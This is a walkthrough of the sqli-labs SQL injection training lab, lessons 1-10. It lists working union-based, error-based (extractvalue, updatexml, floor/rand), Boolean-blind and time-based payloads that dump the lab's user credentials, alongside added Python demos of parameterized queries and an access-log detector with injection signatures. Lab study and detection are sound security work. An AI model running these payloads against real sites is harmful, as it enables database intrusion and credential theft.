sqli-labs Basic Challenges Less1-10
2022-07-25 14:08:00 【The goal is technology house】
SQL Injection
Summary (written up front):
Less 1-9 increase in difficulty roughly in this order:
1. The result of a correct query is visible, and the specific error message is visible:
Less 1-4: use union select to display the required fields in place of the correct result;
Pay attention to whether the parameter is integer or string, whether it is wrapped in single or double quotes, and whether there are parentheses.
2. The result of a correct query is not visible, but the specific error message is visible:
Less 5-6, the "double injection" type: use error-based injection.
3. Only a right/wrong indication, no details:
Less 8, Boolean-based blind injection: the table names, column names and data are extracted one character at a time.
4. No information at all:
Less 9-10, time-based blind injection: if the preceding condition is true, a delay function is executed.
Ideas for Less 1 and Less 2
1. Determine whether the injection point is string type or integer type:
Input 2-1. If it is integer, 2-1 is evaluated as 1; if it is string, '2-1' is treated as '2'.
This involves MySQL implicit type conversion; reference: https://www.jb51.net/article/101531.htm
2. If it is string type, determine whether it is wrapped in single quotes:
2-1" returns normally while 2-1' does not, which indicates single quotes.
' or '1' = '1 returns normally, which indicates that both ends are single quotes and that characters such as spaces are not filtered.
# or -- can be used; both are SQL line comments and comment out the trailing quote.
If # is used, note that it is a URL reserved character and may need to be encoded.
If -- is used, a space must follow it; to keep that trailing space from being stripped, another character can be appended after the space (hence -- -).
3. union select joint query
Step one: determine the number of columns:
union select 1,2,3... can be used to determine the number of columns;
order by n can also be used: it sorts the table by the n-th column, so it fails once n exceeds the number of columns.
Step two: determine which columns are displayed:
With 1' union select 1,2,3 #, possibly due to the configuration, only the first row of multiple results is shown.
So use ' union select 1,2,3 # (an empty id): the first result set is empty, so the self-constructed row is shown, for example displaying 2. That means column 2 is displayed, and afterwards only column 2 needs to be constructed.
Step three: use information_schema
1. Get the name of the current database
select database()
Get all database names
select schema_name from information_schema.schemata
2. Get the table names of the required database
select table_name from information_schema.tables where table_schema = database()
3. Get the column names of the required table
select column_name from information_schema.columns where table_name=' required table name ' and table_schema=database()
4. Get all the data of the required table
select col1, col2,... from required_table
Note:
group_concat(schema_name) displays the results as a group: the values of many rows are merged into one row, not limited by row count, separated by commas. Columns are concatenated directly; separators can be added by hand, such as group_concat(col1,',',col2,',',col3).
When debugging a union select, pay attention to the quote constructed in front, the number of columns, and the trailing -- followed by a character.
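As an added example (not from the original write-up or from sqli-labs), the following Python script reproduces the WHERE id='$id' query shape that Less 1-4 are built on against an in-memory SQLite table with constructed rows, and runs the probes from this section (' or '1'='1, 1' -- -, and a union select) through both a string-concatenated query and a parameterized one. The table contents and column names are assumptions for the demo; SQLite stands in for MySQL so it runs offline, which is also why the integer-versus-string probe (2-1) is not included: SQLite does not perform the implicit conversion the text describes.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample data shaped like the sqli-labs `users` table (id, username, password).
# These rows are made up for this example, not copied from the lab.
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssw0rd-demo"),
]

# sqli-labs query shape: SELECT * FROM users WHERE id='$id' LIMIT 0,1
# The LIMIT is left off here so every row the WHERE clause admits is visible.
VULNERABLE_TEMPLATE = "SELECT id, username, password FROM users WHERE id='{id}'"
SAFE_TEMPLATE = "SELECT id, username, password FROM users WHERE id=?"


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concatenated(user_input: str) -> List[Tuple]:
    """The vulnerable pattern: user input pasted into the SQL text inside single quotes."""
    conn = make_db()
    sql = VULNERABLE_TEMPLATE.format(id=user_input)
    try:
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


def lookup_parameterized(user_input: str) -> List[Tuple]:
    """The fix: the driver binds the value, so quotes and comments inside it stay data."""
    conn = make_db()
    try:
        return conn.execute(SAFE_TEMPLATE, (user_input,)).fetchall()
    finally:
        conn.close()


def compare(user_input: str) -> Tuple[int, int]:
    """Row counts returned by the concatenated and the parameterized query for one input."""
    return len(lookup_concatenated(user_input)), len(lookup_parameterized(user_input))


if __name__ == "__main__":
    for probe in ["1", "' or '1'='1", "1' -- -", "0' union select 1,2,3 -- -"]:
        concatenated, parameterized = compare(probe)
        print(f"{probe!r:32} concatenated={concatenated} parameterized={parameterized}")
```

With the concatenated query the quote-closing probe returns every row, the comment probe returns row 1, and the union probe returns the constructed row (1, 2, 3); the parameterized version returns one row for the plain id and nothing for each probe, because the whole string is compared as a value.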
Less-3 GET-Error based-Single quotes with twist-String
The wrong idea I had while doing this challenge:
?id=1 // normal
?id=1' -- - // abnormal, which suggests the ' inside has been replaced, so the single quotes fail to pair
?id=1\' -- - // returns normally, which suggests \' was replaced with \\'
?id=1\' union select 1 -- -
?id=1\' union select 1,2 -- - // all return normally, which suggests select is probably being filtered
At step 3 I could not go on, because I could not work out how select was being filtered. It turned out that the whole idea was wrong!
1. When testing, input ?id=1' so that the error message can be seen:
check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
Testing with ?id=1' -- - as before gives an error result that says nothing at all about the parenthesis.
Escaping the single quote was also a completely wrong idea: it makes select part of the id string, so it does nothing at all. As for why it still returns normally, my guess is that when the database runs the query it converts the string to int and just takes the leading numeric characters.
2. Continuing the correct way:
?id=1') // error
?id=1') -- - // returns normally
?id=1') union select 1,2,3 -- - // normal, which means there are 3 columns
?id=0') union select 1,2,3 -- - // shows 2,3, which means columns 2 and 3 are displayed.
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -
// Because only 1 row is shown, use id=0. To display all table names at once, join them with group_concat(). The users table looks interesting.
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- - // get the column names
?id=0') union select 1,2,group_concat(id,',',username,',',password) from users -- -
// Successfully obtain all usernames and passwords
Less-4 GET-Error based-Double Quotes-String
?id=1' // normal
?id=1" // error: for the right syntax to use near '"1"") LIMIT 0,1' at line 1
// Note that on the right there is not just a double quote but also a parenthesis
?id=1") -- - // normal
?id=1") union select 1,2,3 -- -
// The rest is the same routine, down to the final
?id=0") union select 1,2,group_concat(id,',',username,',',password) from users -- -
Less-5 GET-Double Injection-Single Quotes-String
?id=1 // returns "you are in"
?id=1' // error
?id=1' -- - // returns "you are in"
?id=0' union select 1,2,3 -- - // still returns "you are in"
// The previous method cannot get any more information
No idea, so I went to Baidu.
The characteristic of this challenge is that every correct input returns the same result, while wrong input produces an error.
So consider error-based injection: use the error message to carry the information needed for the next step.
Error-based method 1: extractvalue()
This function is normally used to query XML documents; usage is extractvalue(target xml document, xml path). When the path has a syntax error it raises an error and shows what the error is. For example extractvalue('anything',concat('~',(select database()))): because a path starting with ~ is definitely not valid XPath syntax, an error is raised, and the error message displays the database name.
Test it:
?id=0' and extractvalue('anything',concat('~',(select database())))-- -
The error can be seen: XPATH syntax error: '~security'
Continue with this idea:
?id=0' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
// error: XPATH syntax error: '~emails,referers,uagents,users'. Omitting several steps:
?id=0' and extractvalue('anything',concat('~',(select group_concat(id,',',username,',',password) from users)))-- -
// error: XPATH syntax error: '~1,Dumb,Dumb,2,Angelina,I-kill-y'
Note: extractvalue() only reports 32 characters at a time; to see the rest, use substring.
?id=0' and extractvalue('anything',concat('~',substring((select group_concat(id,',',username,',',password) from users),32,32)))-- -
// error: XPATH syntax error: '~ou,3,Dummy,[email protected],4,secure,cr'
Error-based method 2: updatexml()
This function is used to update an XML document; the syntax is updatexml(target xml document, xml path, new content).
Fill the first and third parameters with anything; the second parameter is again built with concat to form a nonexistent xml path. It is also limited to 32 characters per query.
Test it:
?id=0' and updatexml('anything',concat('~',(select group_concat(id,',',username,',',password) from users)),'anything')-- -
// If it succeeds you get the error XPATH syntax error: '~1,Dumb,Dumb,2,Angelina,I-kill-y'
Error-based method 3: floor()
Reference: https://blog.csdn.net/wn314/article/details/89297560
Basic knowledge:
floor() returns the largest integer less than or equal to its argument;
rand() produces a random number between 0 and 1;
rand(X) produces a random number between 0 and 1 seeded with X; if X is unchanged, the random sequence does not change;
floor(rand(X)*2) produces a random integer 0 or 1;
count(*) with group by counts the distinct values of a column and how many of each there are.
Statement format:
select count(*) , floor(rand(14)*2) as x from information_schema.tables group by x
floor(rand(14)*2) is aliased as column x, and the tables are counted grouped by the value of x.
Error principle:
The first 4 values of floor(rand(14)*2) are 1 0 1 0.
MySQL first creates a temporary table and scans information_schema.tables row by row. The first evaluation of the floor function gives 1; the temporary table has no row with key 1, so a record is to be inserted, but at this point the floor function is evaluated a second time and gives 0, so the record actually inserted is (0,1).
MySQL continues scanning information_schema.tables. The third evaluation of the floor function gives 1; no row with key 1 is found, so a record is to be inserted; the fourth evaluation gives 0, and inserting it causes a primary key conflict, producing an error like Duplicate entry '0' for key 'group_key'.
In other words, in MySQL a group by statement evaluates the same rand function several times and gets a new value each time.
So we can use concat to join the SQL statement we construct with the floor function, so that the error message displays the result.
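To make the error principle concrete, here is an added Python simulation (my own code, not from the write-up or from MySQL) of the temporary-table logic described above: each scanned row looks the group key up using one evaluation of floor(rand(14)*2) and, when the key is absent, inserts using a second evaluation. It is driven by the value sequence the text gives (1 0 1 0) and by a prefix standing in for what concat() places in front of the floor value, such as the database name. The double-evaluation behaviour is taken from the description above, not checked against MySQL source.

```python
from typing import Dict, Iterable, Optional


class DuplicateEntry(Exception):
    """Stands in for the MySQL duplicate-key error raised on the temporary table's group key."""


def simulate_group_by(key_values: Iterable[int], rows: int, prefix: str = "") -> Dict[str, int]:
    """Replay the temporary-table logic the text describes.

    key_values: successive results of floor(rand(X)*2), one per evaluation.
    rows: how many rows of the scanned table (information_schema.tables in the text) to process.
    prefix: the text concat() puts before the floor value (e.g. the database name).
    Returns the finished group counts, or raises DuplicateEntry with a MySQL-style message.
    """
    values = iter(key_values)
    temp_table: Dict[str, int] = {}
    for _ in range(rows):
        key = f"{prefix}{next(values)}"          # first evaluation: look the key up
        if key in temp_table:
            temp_table[key] += 1                 # group exists: just count the row
            continue
        key = f"{prefix}{next(values)}"          # second evaluation: the key actually inserted
        if key in temp_table:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        temp_table[key] = 1
    return temp_table


def error_message(key_values: Iterable[int], rows: int, prefix: str = "") -> Optional[str]:
    """The error text the simulation produces, or None if the GROUP BY completes."""
    try:
        simulate_group_by(key_values, rows, prefix)
    except DuplicateEntry as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Sequence from the text: 1 0 1 0. Two scanned rows are enough to trigger the conflict.
    print(error_message([1, 0, 1, 0], rows=2))
    print(error_message([1, 0, 1, 0], rows=2, prefix="security"))
    # A key that does not change between evaluations never conflicts.
    print(simulate_group_by([0, 0, 0, 0], rows=3))
```

The prefixed run reproduces the message shape seen later in Less-6 (Duplicate entry 'security0' ...), and the constant-key run shows that the conflict depends entirely on the key changing between lookup and insert. From the defender's side, the whole technique only works because the database error text is echoed into the HTTP response; an application that catches database exceptions and returns a generic error while logging the detail server-side gives nothing back.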
Test it:
?id=1' union select 1,count(*), concat((select version()), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
Note that union select must be followed by the correct number of columns, then the concat function. Result: Duplicate entry '5.5.44-0ubuntu0.14.04.10' for key 'group_key'.
?id=1' union select 1,count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema=database()), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
I don't know why, but using group_concat directly here does not work.
Use substring:
?id=1' union select 1,count(*), concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
Adding substring makes it display. Changing 100 to 153 still displays; 154 does not.
Result: Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'.
Of course you can also try one at a time in the following way. limit 0,1 means start from the first record and take 1:
?id=1' union select 1,count(*), concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
// Result: Duplicate entry 'emails0' for key 'group_key', so the first table is called referers
// ... until limit 3,1 gives users
Finally:
?id=1' union select 1,count(*), concat(substring((select group_concat(id,',',username,',',password) from users),1,100), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
The result obtained:
Duplicate entry '1,Dumb,Dumb,2,Angelina,I-kill-you,3,Dummy,[email protected],4,secure,crap' for key 'group_key'
Less-6 GET-Double Injection-Double Quotes-String
?id=1 //you are in...
?id=1" // error
?id=1" -- - //you are in...
Error-based injection attempt 1:
1. Test whether it works
?id=1" and extractvalue('anything', concat('~', (select database()))) -- -
// error XPATH syntax error: '~security'
2. Dump the table names
?id=1" and extractvalue('anything', concat('~', (select group_concat(table_name) from information_schema.tables where table_schema=database()))) -- -
// error XPATH syntax error: '~emails,referers,uagents,users'
3. Dump the column names
?id=1" and extractvalue('anything', concat('~', (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) -- -
// error XPATH syntax error: '~id,username,password'
4. Get all the data in the table
?id=1" and extractvalue('anything', concat('~', (select group_concat(id,' ',username, ' ', password) from users))) -- -
// error XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
// Use substring to get the remaining part
?id=1" and extractvalue('anything', concat('~', substring((select group_concat(id,' ',username, ' ', password) from users),32,32))) -- -
// error XPATH syntax error: '~ou,3 Dummy [email protected],4 secure cr'
Error-based injection attempt 2:
?id=1" and updatexml('anything', concat('~', (select group_concat(id,' ',username, ' ', password) from users)), 'anything') -- -
// error XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Error-based injection attempt 3:
1. Confirm the number of columns
?id=1" union select 1,2,3-- - //you are in...
2. Test whether the statement works
?id=1" union select 1,count(*),concat((select database()),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// error Duplicate entry 'security0' for key 'group_key'
3. Skip the step-by-step approach and dump the column names directly
?id=1" union select 1,count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// I still don't know why substring has to be added...
// error Duplicate entry 'id,username,password0' for key 'group_key'
4. Dump the data
?id=1" union select 1,count(*),concat(substring((select group_concat(id,' ',username, ' ', password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// error Duplicate entry '1 Dumb Dumb,2 Angelina I-kill-you,3 Dummy [email protected],4 secure crap' for key 'group_key'
Less-7 GET-Dump into outfile-String
?id=1 //You are in.... Use outfile......
1. Determine whether it is integer or string type
?id=18 // error
?id=18-17 // error, so it is not integer but string. If it were integer, 18-17 would be computed as 1.
2. Determine whether it is single or double quotes
?id=1' // error
?id=1" // no error, so id must be wrapped in single quotes. If id were wrapped in double quotes, the single quote would not error and the double quote would.
3. Determine whether there are parentheses after the single quote
?id=1'-- - // error, but no error echo, so you have to guess; the only likely problem is missing parentheses
?id=1')-- - // still an error; add another parenthesis
?id=1'))-- - // no error
4. Determine how many columns
?id=1')) union select 1,2,3-- - // no error
Try writing to an external file:
Because the server is not on my side, I cannot see the file after writing it, so I will not consider this for now.
Less-8 GET-Blind-Boolian Based-Single Quotes
The characteristic of blind injection is that it only distinguishes right from wrong; there is no specific error echo.
1. Construct the blind injection format and check that it is correct
?id=1' union select 1,2,3-- -
?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
// Determine the first character of the table names. Note the use of and: the left side always has a value; the right side is true only when the guess is correct
?id=1' and substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'-- -
Use Burp Suite to brute-force the length (screenshot omitted):
The total length of the table names turns out to be 29.
Next, use string.printable from Python's string module to get all printable characters and build a dictionary, then use Burp Suite to test each character of the table names (screenshot omitted):
The first character obtained is e.
Then change substring(...,1,1) to substring(...,2,1) to get the second character, m, and so on to get all the table names, then all the column names, then all the data.
As you can see, the whole process is very tedious, so you can write your own automated script to do it. When writing the script, binary search can be used to speed it up.
Less-9 Blind-Time based-Single Quotes-String
The characteristic of time-based blind injection is that it returns the same thing whether the condition is correct or not.
?id=1' and sleep(3)-- -
// A noticeable delay is seen, so the injection works
// The reason: if id=1' can query a value, sleep(3) is executed; if id=1' cannot query a value, the part after and is not executed. A delay means the later part was executed, which means the part before and is correct.
For example, the following produces an obvious delay:
?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29 and sleep(3)-- -
The method is the same as before, trying one at a time: get the length, then the table names, the column names and the data in order.
Less 10 is the same idea, just with double quotes instead.
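Everything in Less 1-10 arrives through the id query parameter, so from the defender's side the same payload families can be recognised in web server access logs. The following is an added Python example (not part of the write-up) that URL-decodes the query string of Apache-style log lines and tags each parameter value with the families used above: union select, extractvalue/updatexml, the floor(rand())/group by trick, Boolean probes, sleep(), information_schema lookups and comment terminators. The log lines are constructed for the example from the payload shapes on this page; the regular expressions are my own and only cover those shapes.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access log lines. The query strings are URL-encoded forms of
# payload shapes from the write-up above; the host, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jul/2022:14:08:00 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 720
10.0.0.5 - - [25/Jul/2022:14:08:01 +0800] "GET /Less-1/?id=0%27%20union%20select%201,2,3%20--%20- HTTP/1.1" 200 731
10.0.0.5 - - [25/Jul/2022:14:08:02 +0800] "GET /Less-5/?id=0%27%20and%20extractvalue(%27anything%27,concat(%27~%27,(select%20database())))--%20- HTTP/1.1" 200 812
10.0.0.5 - - [25/Jul/2022:14:08:03 +0800] "GET /Less-5/?id=1%27%20union%20select%201,count(*),concat((select%20version()),floor(rand(14)*2))%20as%20c%20from%20information_schema.tables%20group%20by%20c%20--%20- HTTP/1.1" 200 840
10.0.0.5 - - [25/Jul/2022:14:08:04 +0800] "GET /Less-8/?id=1%27%20and%20substring((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1)=%27e%27--%20- HTTP/1.1" 200 720
10.0.0.5 - - [25/Jul/2022:14:08:05 +0800] "GET /Less-9/?id=1%27%20and%20sleep(3)--%20- HTTP/1.1" 200 720
10.0.0.5 - - [25/Jul/2022:14:08:06 +0800] "GET /Less-1/?id=2-1 HTTP/1.1" 200 720
"""

# Payload families seen in the write-up, keyed by the name reported for a hit.
SIGNATURES = {
    "union": re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b"),
    "error_xpath": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "error_floor": re.compile(r"floor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b"),
    "boolean": re.compile(
        r"\b(?:and|or)\b\s*\(*\s*(?:length|substring|substr|ascii)\s*\(|'\s*or\s*'1'\s*=\s*'1"
    ),
    "time": re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)"),
    "schema_probe": re.compile(r"\binformation_schema\.(?:tables|columns|schemata)\b"),
    "comment_tail": re.compile(r"--\s|#"),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')


def normalize(value: str) -> str:
    """Lower-case and collapse whitespace so spacing does not split a keyword."""
    return re.sub(r"\s+", " ", value).lower()


def classify_value(value: str) -> List[str]:
    """Names of the payload families matching one already URL-decoded parameter value."""
    text = normalize(value)
    return sorted(name for name, pattern in SIGNATURES.items() if pattern.search(text))


def extract_params(log_line: str) -> Dict[str, str]:
    """Decoded query parameters of the request in an access-log line ({} if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    query = urlsplit(match.group("target")).query
    return dict(parse_qsl(query, keep_blank_values=True))


def scan_log(lines: Iterable[str]) -> List[Dict]:
    """One finding per parameter value that matches at least one family."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for name, value in extract_params(line).items():
            families = classify_value(value)
            if families:
                findings.append({"line": number, "param": name, "families": families, "value": value})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {hit['line']}: {hit['param']}={hit['value']!r} -> {', '.join(hit['families'])}")
```

The plain requests (id=1 and the 2-1 type probe) produce no finding, which is the expected blind spot of signature matching: the integer/string test from Less 1-2 looks like ordinary input, so it is the later union, error-based, Boolean and sleep() requests from the same client that make the sequence recognisable. Decoding before matching matters because every quote and space in these lines arrives percent-encoded.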